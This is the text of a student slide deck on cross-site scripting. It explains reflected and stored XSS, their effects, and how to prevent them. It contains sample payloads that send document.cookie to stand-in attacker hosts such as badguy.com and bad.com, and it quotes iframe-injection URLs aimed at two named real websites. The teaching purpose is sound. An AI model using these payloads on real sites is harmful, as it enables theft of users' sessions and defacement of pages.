Cross site scripting (xss)
-
Upload
ritesh-gupta -
Category
Education
-
view
395 -
download
4
description
Transcript of Cross site scripting (xss)
Cross-site scripting
(XSS)
PRESENTED BY :RITESH KUMAR GUPTAVlll Sem (CS)Roll No.- 10ESKCS092
SUBMITTED TO:-MS. NEHA KAPUR(Sr. Lecturer CS)
04/11/2023 2
Cross-site scripting or XSS is a defined as a computer security vulnerability (weakness) found in web applications.
XSS allows for code injection by malicious web users into Internet pages viewed by other users.
In an XSS attack, the attacker
gains the ability to see private user IDs, passwords, credit card information and other personal identification.
CROSS-SITE SCRIPTING (XSS)
04/11/2023 3
stealing other user’s cookies stealing their private information
performing actions on behalf of other users
redirecting to other websitesShowing ads in hidden IFRAMES and pop-ups
XSS (-ve) effects
04/11/2023 4
Two known types: Reflected (Non-
Persistent)• Link in other website or email
Stored (Persistent)• Forum, bulletin board, feedback form
Cross Site Scripting Types
04/11/2023 5
Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web site
Reflected (Non-Persistent)…
04/11/2023 6
Reflected (Non-Persistent)
Send e-mail with <script> tags embedded in the link.
Follows link and the script executes
1
2
http://mybank.com/account.php?variable=”><script>document.lo
cation=’http://www.badguy.com/cgi-bin/cookie.cgi’”%20+document.cookie</script>
www.badguy.com
Cookie collector
Malicious content dose not get stored in the serverThe server bounces the original input to the victim without modification
04/11/2023 7
EXAMPLE :-
04/11/2023 8
In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible blog websites, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users.
see original post<script>window.location = "http://www.hackers.com?yid=";</script>
Stored (Persistent)….
04/11/2023 9
Stored (Persistent)
Upload malicious scripting commands to the public forum
Bro
wse
Do
wn
lao
d
mal
icio
us
cod
e
Public forum web site
Attacker
Victim
1
2 3
Great message! <script>var img=new Image();img.src= "http://www.bad.com/CookieStealer/Form1.aspx?s= "+document.cookie;</script>
The server stores the malicious contentThe server serves the malicious content in its original form
04/11/2023 10
EXAMPLE :
04/11/2023 11
04/11/2023 12
04/11/2023 13
04/11/2023 14
04/11/2023 15
04/11/2023 16
04/11/2023 17
XSS attack’s first target is the ClientClient trusts server (Does not expect
attack)Browser executes malicious script
But second target = Company running the Server
Loss of public image (Blame)Loss of customer trustLoss of money
Who is affected by XSS?
04/11/2023 18
CRIMES RLEATED TO XSS:-
XSS Vulnerability found on Facebook Subdomain-( https://developers.facebook.com/ )- Discovered by Mauritania_Attacker ( AnonGhost )
04/11/2023 19
Time Now Tv & Shiksha Official WebsitesAn 21 Years Old Information Security Expert, Narendra Bhati (R00t Sh3ll The Untracable) From Sheoganj Rajasthan.FEB- 2013
XSS Code for TIMES OF INDIA TV:-http://www.timesnow.tv/videosearchresult.cms?query="/><iframe+src="http://www.breakthesecurity.com"+width="1000px"+height="1000px"></iframe>&srchcombo=1&x=0&y=0 #sthash.Pm0cUkgL.dpuf
04/11/2023 20
XSS Code for Shiksha.com
http://www.shiksha.com/search/index?keyword="/><iframe+src="http://www.breakthesecurity.com"+width=1000+height=1000></iframe>&start=0&institute_rows=-1&content_rows=-1&country_id=&city_id=&zone_id=&locality_id=&course_level=&course_type=&min_duration=&max_duration=&search_type=&search_data_type=&sort_type=&utm_campaign=site_search&utm_medium=internal&utm_source=shiksha&from_page=homepage&autosuggestor_suggestion_shown=5#sthash.Pm0cUkgL.dpuf
04/11/2023 21
Clint side•Cookie Security•Verify email•Always update
Server side•Input validation (Black listing VS White listing)•Encode all meta characters send to the client•keep track of user sessions •Web application firewall•Always test
HOW TO PREVENT XSS
04/11/2023 22